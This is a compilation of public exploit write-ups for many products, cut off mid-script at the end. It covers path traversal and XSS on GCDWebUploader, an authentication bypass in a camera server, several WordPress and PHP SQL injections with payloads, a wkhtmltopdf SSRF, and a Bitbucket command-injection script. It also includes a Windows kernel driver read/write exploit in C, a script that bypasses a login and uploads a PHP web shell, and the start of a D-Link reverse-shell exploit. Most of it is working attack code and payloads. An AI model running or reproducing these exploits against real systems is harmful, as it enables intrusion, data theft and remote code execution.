text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
If-None-Match: 42638202/1663558201/177889085
If-Modified-Since: Mon, 19 Sep 2022 03:30:01 GMT
Connection: close
Content-Length: 0
-------
HTTP/1.1 200 OK
Cache-Control: max-age=3600, public
Content-Length: 317
Content-Type: text/html; charset=utf-8
Connection: Close
Server: GCDWebUploader
Date: Mon, 19 Sep 2022 05:01:11 GMT
<!DOCTYPE html>
<html><head><meta charset="utf-8"></head><body>
<ul>
<li><a href="Cryptexes/">Cryptexes/</a></li>
<li><a href="DriverKit/">DriverKit/</a></li>
<li><a href="Library/">Library/</a></li>
<li><a href="Applications/">Applications/</a></li>
<li><a href="Developer/">Developer/</a></li>
</ul>
</body></html>
#############
LFI on HTTP built-in server
#############
GET /../../../../../../../../../../../../../../../etc/hosts HTTP/1.1
Host: localhost:8080
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)
AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e
Safari/8536.25
X-Requested-With: XMLHttpRequest
Referer: http://localhost:8080/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
----
HTTP/1.1 200 OK
Connection: Close
Server: GCDWebUploader
Content-Type: application/octet-stream
Last-Modified: Sat, 03 Sep 2022 01:37:01 GMT
Date: Mon, 19 Sep 2022 03:28:14 GMT
Content-Length: 213
Cache-Control: max-age=3600, public
Etag: 1152921500312187994/1662169021/0
##
# Host Database
#
# localhost is used to configure the loopback interface
# when the system is booting. Do not change this entry.
##
127.0.0.1 localhost
255.255.255.255 broadcasthost
::1 localhost
###############
path traversal on FTP built-in server
###############
ftp> cd ../../../../../../../../../
250 OK. Current directory is /../../../../../../../../../
ftp> ls
200 PORT command successful.
150 Accepted data connection
total 10
drwxr-xr-x 0 root wheel 256 Jan 01 1970 usr
drwxr-xr-x 0 root wheel 128 Jan 01 1970 bin
drwxr-xr-x 0 root wheel 608 Jan 01 1970 sbin
drwxr-xr-x 0 root wheel 224 Jan 01 1970 System
drwxr-xr-x 0 root wheel 640 Jan 01 1970 Library
drwxr-xr-x 0 root wheel 224 Jan 01 1970 private
drwxr-xr-x 0 root wheel 1131 Jan 01 1970 dev
drwxr-xr-x 0 root admin 4512 Jan 01 1970 Applications
drwxr-xr-x 0 root admin 64 Jan 01 1970 Developer
drwxr-xr-x 0 root admin 64 Jan 01 1970 cores
WARNING! 10 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
ftp>
#############
XSS on HTTP built-in server
#############
poc 1:
http://localhost:8080/download?path=<script>alert(1)</script>
poc 2:
http://localhost:8080/list?path=<script>alert(1)</script>
# Exploit Title: "camp" Raspberry Pi camera server 1.0 - Authentication Bypass
# Date: 2022-07-25
# Exploit Author: Elias Hohl
# Vendor Homepage: https://github.com/patrickfuller
# Software Link: https://github.com/patrickfuller/camp
# Version: < bf6af5c2e5cf713e4050c11c52dd4c55e89880b1
# Tested on: Ubuntu 20.04
# CVE : CVE-2022-37109
"camp" Raspberry Pi camera server Authentication Bypass vulnerability
https://medium.com/@elias.hohl/authentication-bypass-vulnerability-in-camp-a-raspberry-pi-camera-server-477e5d270904
1. Start an instance of the "camp" server:
python3 server.py --require-login
2. Fetch the SHA-512 password hash using one of these methods:
curl http://localhost:8000/static/password.tx%74
OR
curl http://localhost:8000/static/./password.txt --path-as-is
OR
curl http://localhost:8000/static/../camp/password.txt --path-as-is
3. Execute the following python snippet (replace the hash with the hash you received in step 2).
from tornado.web import create_signed_value
import time
print(create_signed_value("5895bb1bccf1da795c83734405a7a0193fbb56473842118dd1b66b2186a290e00fa048bc2a302d763c381ea3ac3f2bc2f30aaa005fb2c836bbf641d395c4eb5e", "camp", str(time.time())))
4. In the browser, navigate to http://localhost:8000/, add a cookie named "camp" and set the value to the result of the script from step 3, then reload the page. You will be logged in.
# Exploit Title: Translatepress Multilinugal WordPress plugin < 2.3.3 - Authenticated SQL Injection
# Exploit Author: Elias Hohl
# Date: 2022-07-23
# Vendor Homepage: https://translatepress.com/
# Software Link: https://wordpress.org/plugins/translatepress-multilingual/
# Version: < 2.3.3
# Tested on: Ubuntu 20.04
# CVE : CVE-2022-3141
Authenticated SQL injection vulnerability in "Translatepress Multilingual" Wordpress plugin
https://medium.com/@elias.hohl/authenticated-sql-injection-vulnerability-in-translatepress-multilingual-wordpress-plugin-effc08eda514
1. Start a new Wordpress instance using docker-compose.
2. Install the translatepress-multilingual plugin. Important note: If there are more than two languages allowed in a kind of premium plan, the exploit might be slightly different. We might need to insert deletion requests between each injection to prevent payloads being executed again. Also note that the en_us_en_gb dictionary table must exist. You might need to add these languages first so the table gets created.
3. Connect your browser to Burp Suite, log in to Wordpress and add any language from the dropdown (the url to do this is /wp-admin/options-general.php?page=translate-press). In Burp Suite, do a right click→ copy to file, and save it as translatepress_req.txt.
4. Go to /sample-page/?trp-edit-translation=preview (a URL to translate an arbitrary post). Again, in Burp Suite do a right mouse click → save to file, and save it as translatepress_req_2.txt.
5. Attack using sqlmap: sqlmap -r translatepress_req.txt -p trp_settings%5Btranslation-languages%5D%5B%5D --dbms=mysql --second-req translatepress_req_2.txt --technique=T --level 5 --risk 3
sqlmap will find a time-based blind payload:
Parameter: trp_settings[translation-languages][] (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: option_page=trp_settings&action=update&_wpnonce=ca410d0e89&_wp_http_referer=/wp-admin/options-general.php?page=translate-press%26settings-updated=true&trp_settings[default-language]=en_US&trp_settings[publish-languages][]=en_US&trp_settings[translation-languages][]=en_US&trp_settings[translation-languages-formality][]=default&trp_settings[url-slugs][en_US]=en_us&trp_settings[translation-languages][]=en_GB WHERE 4372=4372 AND (SELECT 6967 FROM (SELECT(SLEEP(5)))ZDtR)-- bsZU&trp_settings[publish-languages][]=en_GB&trp_settings[translation-languages-formality][]=default&trp_settings[url-slugs][en_GB]=en&trp_settings[native_or_english_name]=english_name&trp_settings[add-subdirectory-to-default-language]=no&trp_settings[force-language-to-custom-links]=yes&trp_settings[shortcode-options]=flags-full-names&trp_settings[menu-options]=flags-full-names&trp_settings[trp-ls-floater]=yes&trp_settings[floater-options]=flags-full-names&trp_settings[floater-color]=dark&trp_settings[floater-position]=bottom-right&trp_email_course_email=
# Exploit Title: wkhtmltopdf 0.12.6 - Server Side Request Forgery
# Date: 20/8/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://wkhtmltopdf.org
# Software Link: https://wkhtmltopdf.org/downloads.html
# Version: 0.12.6
# Tested on: Windows ASP.NET <http://asp.net/>
POST /PDF/FromHTML HTTP/1.1
Host: vulnerable.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: <length>
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
__RequestVerificationToken=Token&header=<PDFstructure+>....&data= <PDFstructure+>....<iframe+src=“http://10.10.10.1”>
# Exploit Title: Bitbucket v7.0.0 - RCE
# Date: 09-23-2022
# Exploit Author: khal4n1
# Vendor Homepage: https://github.com/khal4n1
# Tested on: Kali and ubuntu LTS 22.04
# CVE : cve-2022-36804
#****************************************************************#
#The following exploit is used to exploit a vulnerability present
#Atlassian Bitbucket Server and Data Center 7.0.0 before version
#7.6.17, from version 7.7.0 before version 7.17.10, from version
#7.18.0 before version 7.21.4, from version 8.0.0 before version
#8.0.3, from version 8.1.0 before version 8.1.3, and from version
#8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1
#Usage Example
# python3 mexploit.py --url http://127.0.0.1:7990 --cmd 'cat /etc/passwd'
# python3 mexploit.py --url http://127.0.0.1:7990 --cmd 'id'
#The server will send a 500 http response with the stout output from the
# command executed.
#****************************************************************#
#!/usr/bin/python3
import argparse
import urllib
from urllib import request
import re
#argument setup
parser = argparse.ArgumentParser(description='Program to test
bitbucket vulnerability CVE-2022-36804')
parser.add_argument("--url", help="Set the target to attack.
[REQUIRED]", required=True )
parser.add_argument("--cmd", help="Set the command to execute.
[DEFAULT ID]", required=True, default='id')
args = parser.parse_args()
cmd= urllib.parse.quote(args.cmd)
#reads from the public repository what is available
requ = request.urlopen(args.url+ "/repos?visibility=public")
response = requ.read()
#select a public project and stores it in a variable
project = re.findall('7990/projects/(.*)/repos/',
str(re.findall('7990/projects/(.*)/repos/', str(response))[-1]))[-1]
#Selects a public repo and stores it in a vatiable
file = re.findall('/repos/(.*)/browse',
str(re.findall('7990/projects/(.*)/repos/', str(response))[-1]))[0]
# Exploitation
try :
attack = request.urlopen(args.url +
"/rest/api/latest/projects/" + project + "/repos/" + file +
"/archive?prefix=ax%00--exec=%60"+cmd+"%60%00--remote=origin")
print (attack.response())
except urllib.error.HTTPError as e:
body = e.read().decode() # Read the body of the error response
print (body)
# Exploit Title: NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi
# Exploit Author: Elias Hohl
# Date: 2022-08-01
# Vendor Homepage: https://basixonline.net
# Software Link: https://wordpress.org/plugins/nex-forms-express-wp-form-builder/
# Tested on: Ubuntu 20.04
# CVE : CVE-2022-3142
Authenticated SQL injection vulnerability in the "NEX Forms" Wordpress plugin
https://medium.com/@elias.hohl/authenticated-sql-injection-vulnerability-in-nex-forms-wordpress-plugin-35b8558dd0f5
1. Start a new Wordpress instance using docker-compose.
2. Install the NEX Forms plugin.
3. Open the URL "/wp-admin/admin.php?page=nex-forms-dashboard&form_id=1" in your browser. Save the request to "nex-forms-req.txt" via Burp Suite.
4. Execute the following command: sqlmap -r nex_forms_req.txt -p form_id --technique=T --dbms=mysql --level 5 --risk 3
sqlmap will find a time-based blind payload:
Parameter: form_id (GET)
Type: time-based blind
Title: MySQL >=5.0.12 AND time-based blind (query SLEEP)
Payload: page=nex-forms-dashboard&form_id=1 AND (SELECT 4715 FROM (SELECT(SLEEP(5)))nPUi)
/*
# Exploit Title: System Mechanic v15.5.0.61 - Arbitrary Read/Write
# Date: 26-09-2022
# Exploit Author: Brandon Marshall
# Vendor Homepage: https://www.iolo.com/
# Tested Version - System Mechanic version 15.5.0.61
# Driver Version - 5.4.11 - amp.sys
# Tested on OS - 64 bit Windows 10 (18362)
# Fixed Version - System Mechanic 17.5.0.116
# CVE : CVE-2018-5701
*/
#include <iostream>
#include <Windows.h>
#include <psapi.h>
#include <stdio.h>
#pragma warning(disable:4996)
typedef struct _kernelDriverInformation {
char* imageName;
void* imageBase;
}kernelDriverInformation, * PKernelDriverInformation;
typedef struct _functionInformation {
char* functionName;
void* functionOffset;
void* functionBase;
}functionInformation, * PFunctionInformation;
void callDeviceIoControl(HANDLE deviceHandle, void* inputBuffer, DWORD inputBufferSize) {
DWORD bytesReturned;
NTSTATUS status = DeviceIoControl(deviceHandle, 0x226003, inputBuffer, inputBufferSize, NULL, NULL, (LPDWORD)&bytesReturned, (LPOVERLAPPED)NULL);
}
HANDLE getDeviceHandle(char* name) {
DWORD generic_read = 0x80000000;
DWORD generic_write = 0x40000000;
HANDLE handle = CreateFileA((LPCSTR)name, GENERIC_READ | generic_write, NULL, NULL, 0x3, NULL, NULL);
return handle;
}
void* CreateWriteAddresInAMPsKernelMemoryIOCTLBuffer(void* addressToDereference, SIZE_T bufferSize) {
byte* maliciousBuffer = (byte*)malloc(bufferSize);
*(ULONGLONG*)maliciousBuffer = (ULONGLONG)5; // funciton pointer, this will be 5
*(ULONGLONG*)(maliciousBuffer + 0x8) = (ULONGLONG)(maliciousBuffer + 0x20); //(maliciousBuffer); pointer to parameters
*(ULONGLONG*)(maliciousBuffer + 0x10) = (ULONGLONG)(maliciousBuffer + 0x10); //(maliciousBuffer + 0x20);// (0x1); pointer to write return value
*(ULONGLONG*)(maliciousBuffer + 0x18) = (ULONGLONG)0;//(ULONGLONG)(maliciousBuffer + 0x40); // unknown
*(ULONGLONG*)(maliciousBuffer + 0x20) = (ULONGLONG)16; // this will be 16
*(ULONGLONG*)(maliciousBuffer + 0x28) = (ULONGLONG)0; // param2
*(ULONGLONG*)(maliciousBuffer + 0x30) = (ULONGLONG)addressToDereference; // param3
*(ULONGLONG*)(maliciousBuffer + 0x38) = (ULONGLONG)0; // param4
return (void*)maliciousBuffer;
}
void* CreateReadDWORDFromKernelMemoryLeakIOCTLBuffer(SIZE_T bufferSize) {
byte* maliciousBuffer = (byte*)malloc(bufferSize);
*(ULONGLONG*)maliciousBuffer = (ULONGLONG)5; // funciton pointer, this will be 5
*(ULONGLONG*)(maliciousBuffer + 0x8) = (ULONGLONG)(maliciousBuffer + 0x20); //(maliciousBuffer); pointer to parameters
*(ULONGLONG*)(maliciousBuffer + 0x10) = (ULONGLONG)(maliciousBuffer + 0x10); //(maliciousBuffer + 0x20);// (0x1); pointer to write return value
*(ULONGLONG*)(maliciousBuffer + 0x18) = (ULONGLONG)0;//(ULONGLONG)(maliciousBuffer + 0x40); // unknown
*(ULONGLONG*)(maliciousBuffer + 0x20) = (ULONGLONG)16; // this will be 16
*(ULONGLONG*)(maliciousBuffer + 0x28) = (ULONGLONG)2; // param2
*(ULONGLONG*)(maliciousBuffer + 0x30) = (ULONGLONG)(maliciousBuffer + 0x40); // param3
*(ULONGLONG*)(maliciousBuffer + 0x38) = (ULONGLONG)(maliciousBuffer + 0x48); // param4
*(ULONGLONG*)(maliciousBuffer + 0x40) = (ULONGLONG)0; //unknown
*(ULONGLONG*)(maliciousBuffer + 0x48) = 0xffffffff; // param1
return (void*)maliciousBuffer;
}
void* CreateWriteDWORDFromKernelMemoryIOCTLBuffer(void* addressToWriteTo, SIZE_T bufferSize) {
byte* maliciousBuffer = (byte*)malloc(bufferSize);
*(ULONGLONG*)maliciousBuffer = (ULONGLONG)5; // funciton pointer, this will be 5
*(ULONGLONG*)(maliciousBuffer + 0x8) = (ULONGLONG)(maliciousBuffer + 0x20); //(maliciousBuffer); pointer to parameters
*(ULONGLONG*)(maliciousBuffer + 0x10) = (ULONGLONG)(maliciousBuffer + 0x10); //(maliciousBuffer + 0x20);// (0x1); pointer to write return value
*(ULONGLONG*)(maliciousBuffer + 0x18) = (ULONGLONG)0;//(ULONGLONG)(maliciousBuffer + 0x40); // unknown
*(ULONGLONG*)(maliciousBuffer + 0x20) = (ULONGLONG)16; // this will be 16
*(ULONGLONG*)(maliciousBuffer + 0x28) = (ULONGLONG)2; // param2
*(ULONGLONG*)(maliciousBuffer + 0x30) = (ULONGLONG)addressToWriteTo; // param3
*(ULONGLONG*)(maliciousBuffer + 0x38) = (ULONGLONG)(maliciousBuffer + 0x40); // param4
*(ULONGLONG*)(maliciousBuffer + 0x40) = (ULONGLONG)0xffffffff;
return (void*)maliciousBuffer;
}
DWORD leakDWORD(void* addressToLeak, HANDLE deviceHandle, SIZE_T bufferSize) {
void* writeAddresInAMPsKernelMemoryIOCTLBuffer = CreateWriteAddresInAMPsKernelMemoryIOCTLBuffer(addressToLeak, bufferSize);
callDeviceIoControl(deviceHandle, writeAddresInAMPsKernelMemoryIOCTLBuffer, bufferSize);
free(writeAddresInAMPsKernelMemoryIOCTLBuffer);
//address should now be written in kernel memory
void* ReadDWORDFromKernelMemoryLeakIOCTLBuffer = CreateReadDWORDFromKernelMemoryLeakIOCTLBuffer(bufferSize);
callDeviceIoControl(deviceHandle, ReadDWORDFromKernelMemoryLeakIOCTLBuffer, bufferSize);
DWORD returnVal = *(DWORD*)((byte*)ReadDWORDFromKernelMemoryLeakIOCTLBuffer + 0x40);
free(ReadDWORDFromKernelMemoryLeakIOCTLBuffer);
return returnVal;
}
void writeDWORD(void* addressToWrite, void* PDWORDToWrite, HANDLE deviceHandle, SIZE_T bufferSize) {
void* writeAddresInAMPsKernelMemoryIOCTLBuffer = CreateWriteAddresInAMPsKernelMemoryIOCTLBuffer(PDWORDToWrite, bufferSize);
callDeviceIoControl(deviceHandle, writeAddresInAMPsKernelMemoryIOCTLBuffer, bufferSize);
free(writeAddresInAMPsKernelMemoryIOCTLBuffer);
//address should now be written in kernel memory
void* ReadDWORDFromKernelMemoryLeakIOCTLBuffer = CreateWriteDWORDFromKernelMemoryIOCTLBuffer(addressToWrite,bufferSize);
callDeviceIoControl(deviceHandle, ReadDWORDFromKernelMemoryLeakIOCTLBuffer, bufferSize);
free(ReadDWORDFromKernelMemoryLeakIOCTLBuffer);
return;
}
void* leakQWORD(void* addressToLeak, HANDLE deviceHandle, SIZE_T bufferSize) {
DWORD firstDWORD = leakDWORD(addressToLeak, deviceHandle, bufferSize);
DWORD secondDWORD = leakDWORD((byte*)addressToLeak + 0x4, deviceHandle, bufferSize);
void** Pqword = (void**)malloc(0x8);
for (int i = 0; i < 4; i++) {
((byte*)Pqword)[i] = ((byte*)&firstDWORD)[i];
((byte*)Pqword)[i + 4] = ((byte*)&secondDWORD)[i];
}
return (*(void**)Pqword);
}
void writeQWORD(void* addressToWrite, void* QWORDToWrite, HANDLE deviceHandle, SIZE_T bufferSize) {
writeDWORD(addressToWrite, QWORDToWrite, deviceHandle, bufferSize);
writeDWORD((byte*)addressToWrite + 0x4, ((byte*)QWORDToWrite + 0x4), deviceHandle, bufferSize);
}
int main(int argc, char* argv[])
{
ULONGLONG addressToReadorWrite = strtoull(argv[2], NULL, 16);
HANDLE deviceHandle = getDeviceHandle((char*)"\\\\.\\AMP");
SIZE_T size = 0x300;
if (strcmp(argv[1], "read") == 0) {
void* leakedQWORD = leakQWORD((void*)addressToReadorWrite, deviceHandle, size);
printf("Value stored at virtual address %0llx is %0llx", addressToReadorWrite, leakedQWORD);
}
else if (strcmp(argv[1], "write") == 0) {
ULONGLONG QWORDToWrite = strtoull(argv[3], NULL, 16);
writeQWORD((void*)addressToReadorWrite, (void*)&QWORDToWrite, deviceHandle, size);
printf("Wrote %0llx to virtual address %0llx", QWORDToWrite, addressToReadorWrite);
}
}
# Exploit Title: Yoga Class Registration System v1.0 - Multiple SQLi
# Date: 19/03/2023
# Exploit Author: Abdulhakim Öner
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html
# Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-ycrs.zip
# Version: 1.0
# Tested on: Windows, Linux
## Description
A Blind SQL injection vulnerability in the "cid" parameter in Online Pizza Ordering System allows remote unauthenticated attackers to dump database through arbitrary SQL commands.
## Request PoC
```
GET /php-ycrs/?p=yclasses%2fregistration&cid=2' HTTP/1.1
Host: 192.168.1.101
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: http://192.168.1.101/php-ycrs/?p=yclasses%2fview_class&id=2
Cookie: PHPSESSID=1pbq6ushdtnf0o5oqhdcv81l4v
```
This request causes a Fatal Error in the webapp. Adding "'%2b(select*from(select(sleep(10)))a)%2b'" to the end of "cid" parameter, the response to request was 200 status code with message of OK, but 10 seconds later, which indicates that our sleep 10 command works.
```
GET /php-ycrs/?p=yclasses%2fregistration&cid=2'%2b(select*from(select(sleep(20)))a)%2b' HTTP/1.1
Host: 192.168.1.101
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: http://192.168.1.101/php-ycrs/?p=yclasses%2fview_class&id=2
Cookie: PHPSESSID=1pbq6ushdtnf0o5oqhdcv81l4v
```
## Exploit with sqlmap
Save the request from burp to file
```
sqlmap -r sqli.txt -p 'cid' --batch --dbs --level=3 --risk=2
---snip---
GET parameter 'cid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 302 HTTP(s) requests:
---
Parameter: cid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: p=yclasses/registration&cid=2' AND 5068=5068-- JfDq
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: p=yclasses/registration&cid=2' AND (SELECT 3800 FROM(SELECT COUNT(*),CONCAT(0x717a7a6b71,(SELECT (ELT(3800=3800,1))),0x7170787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- hjLV
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: p=yclasses/registration&cid=2' AND (SELECT 6005 FROM (SELECT(SLEEP(5)))kQyZ)-- btnY
---
[16:00:10] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.54, PHP 8.2.0
---snip---
```
## The "id" parameter in "/php-ycrs/?p=yclasses%2fview_class&id=1" and "/php-ycrs/admin/?page=classes%2fmanage_class&id=2" are also vulnerable. It can be exploited in the same way.
# Exploit Title: Human Resources Management System v1.0 - Multiple SQLi
# Date: 16/03/2023
# Exploit Author: Abdulhakim Öner
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html
# Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hrm.zip
# Version: 1.0
# Tested on: Windows
## Description
A Blind SQL injection vulnerability in the login page (/hrm/controller/login.php) in Human Resources Management System allows remote unauthenticated attackers to execute remote command through arbitrary SQL commands by "name" parameter.
## Request PoC
```
POST /hrm/controller/login.php HTTP/1.1
Host: 192.168.1.103
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: http://192.168.1.103/hrm/
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
name=test@testdomain.com'&password=test&submit=Sign+In
```
This request causes an error. Adding "'%2b(select*from(select(sleep(20)))a)%2b'" to the end of "name" parameter, the response to request was 302 status code with message of Found, but 20 seconds later, which indicates that our sleep 20 command works.
```
POST /hrm/controller/login.php HTTP/1.1
Host: 192.168.1.103
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: http://192.168.1.103/hrm/
Content-Type: application/x-www-form-urlencoded
Content-Length: 114
name=test@testdomain.com'%2b(select*from(select(sleep(20)))a)%2b'&password=test&submit=Sign+In
```
## Exploit with sqlmap
Save the request from burp to file
```
┌──(root㉿caesar)-[/home/kali/Workstation/hrm]
└─# sqlmap -r sqli.txt -p 'name' --batch --dbs --level=3 --risk=2
---snip----
[15:49:36] [INFO] testing 'MySQL UNION query (89) - 81 to 100 columns'
POST parameter 'name' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 838 HTTP(s) requests:
---
Parameter: name (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: name=test@testdomain.com' AND 3287=(SELECT (CASE WHEN (3287=3287) THEN 3287 ELSE (SELECT 8737 UNION SELECT 2671) END))-- -&password=a5P!s3v!K8&submit=Sign In
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: name=test@testdomain.com' OR (SELECT 6958 FROM(SELECT COUNT(*),CONCAT(0x717a766b71,(SELECT (ELT(6958=6958,1))),0x716b786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VHwA&password=a5P!s3v!K8&submit=Sign In
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: name=test@testdomain.com' AND (SELECT 1760 FROM (SELECT(SLEEP(5)))LTmV)-- fhJt&password=a5P!s3v!K8&submit=Sign In
---
[15:49:36] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.2.0, Apache 2.4.54, PHP
----snip----
```
## The "password" parameter in the POST request is also vulnerable. It can be exploited in the same way.
# Exploit Title: Online Diagnostic Lab Management System v1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Google Dork: N/A
# Date: 2022-9-23
# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11
# Vendor Homepage: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/diagnostic_0.zip
# Tested on: windows 11 - XAMPP
# Version: 1.0
# Authentication Required: bypass login with sql injection
#/usr/bin/python3
import requests
import os
import sys
import time
import random
# clean screen
os.system("cls")
os.system("clear")
logo = '''
##################################################################
# #
# Exploit Script ( Online Diagnostic Lab Management System ) #
# #
##################################################################
'''
print(logo)
url = str(input("Enter website url : "))
username = ("' OR 1=1-- -")
password = ("test")
req = requests.Session()
target = url+"/diagnostic/login.php"
data = {'username':username,'password':password}
website = req.post(target,data=data)
files = open("rev.php","w")
payload = "<?php system($_GET['cmd']);?>"
files.write(payload)
files.close()
hash = random.getrandbits(128)
name_file = str(hash)+".php"
if "Login Successfully" in website.text:
print("[+] Login Successfully")
website_1 = url+"/diagnostic/php_action/createOrder.php"
upload_file = {
"orderDate": (None,""),
"clientName": (None,""),
"clientContact" : (None,""),
"productName[]" : (None,""),
"rateValue[]" : (None,""),
"quantity[]" : (None,""),
"totalValue[]" : (None,""),
"subTotalValue" : (None,""),
"totalAmountValue" : (None,""),
"discount" : (None,""),
"grandTotalValue" : (None,""),
"gstn" : (None,""),
"vatValue" : (None,""),
"paid" : (None,""),
"dueValue" : (None,""),
"paymentType" : (None,""),
"paymentStatus" : (None,""),
"paymentPlace" : (None,""),
"productImage" : (name_file,open("rev.php","rb"))
}
up = req.post(website_1,files=upload_file)
print("[+] Check here file shell => "+url+"/diagnostic/assets/myimages/"+name_file)
print("[+] can exect command here => "+url+"/diagnostic/assets/myimages/"+name_file+"?cmd=whoami")
else:
print("[-] Check username or password")
# Exploit Title: D-Link DNR-322L <=2.60B15 - Authenticated Remote Code Execution
# Date: 13.09.2022
# Exploit Author: luka <luka@lukasec.ch>
# Exploit Writeup: https://lukasec.ch/posts/dlink_dnr322.html
# Vendor Homepage: https://dlink.com
# Vendor Advisory: https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10305
# Software Link: http://legacyfiles.us.dlink.com/DNR-322L/REVA/FIRMWARE
# Version: <= 2.60B15
# Tested on: Debian, Windows 10
"""
# Vulnerability
Inside the configuration backup from "Maintenance/System/Configuration Settings" is the bash script "rc.init.sh". The device does not check the integrity of a restored configuration backup which enables editing of set bash script. This bash script will be executed when the device boots.
# Usage
exploit.py [-h] -U USERNAME [-P PASSWORD] -t TARGET -l LHOST -p LPORT
options:
-h, --help show this help message and exit
-U USERNAME, --username USERNAME
Username, ex: admin
-P PASSWORD, --password PASSWORD
Password for the specified user
-t TARGET, --target TARGET
IP of the target, ex: 192.168.99.99
-l LHOST, --lhost LHOST
IP for the reverse shell to connect back to, ex: 123.123.123.123
-p LPORT, --lport LPORT
Port for the reverse shell to connect back to, ex: 8443
"""
import argparse, socket, requests, base64, urllib, os, shutil, tarfile, random, string
from ipaddress import ip_address
args = argparse.ArgumentParser()
args.add_argument(
"-U",
"--username",
type=str,
required=True,
dest="username",
help="Username, ex: admin",
)
args.add_argument(
"-P",
"--password",
type=str,
required=False,
dest="password",
help="Password for the specified user",
)
args.add_argument(
"-t",
"--target",
type=str,
required=True,
dest="target",
help="IP of the target, ex: 192.168.99.99",
)
args.add_argument(
"-l",
"--lhost",
type=str,
required=True,
dest="lhost",
help="IP for the reverse shell to connect back to, ex: 123.123.123.123",
)
args.add_argument(
"-p",
"--lport",
type=int,
required=True,
dest="lport",
help="Port for the reverse shell to connect back to, ex: 8443",
)
args = args.parse_args()
# base64 + url encode string
# returns string
def b64_url_encode(data):
enc = data.encode("utf-8")
encB = base64.b64encode(enc)
encUrl = urllib.parse.quote(str(encB, "utf-8"))
return encUrl
# since user input is always unsafe, test IPs
try:
ip_address(args.target)
except Exception:
print("[!] Target IP is not a valid IP address")
exit(1)
try:
ip_address(args.lhost)
except Exception:
print("[!] Reverse shell IP is not a valid IP address")
exit(1)
# check if target is online
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(2)
# hardcoded http, change if needed
s.connect((args.target, 80))
s.close()
except Exception:
print("[!] Target is not online")
exit(1)
print("[+] Target is online")
# login param
authUrl = "http://" + args.target + "/cgi-bin/login_mgr.cgi"
authHeaders = {"content-type": "application/x-www-form-urlencoded"}
authCheckCmd = "cmd=ui_check_wto"
session = requests.Session()
# if password is empty supply dont supply anything
if not args.password:
authBody = (
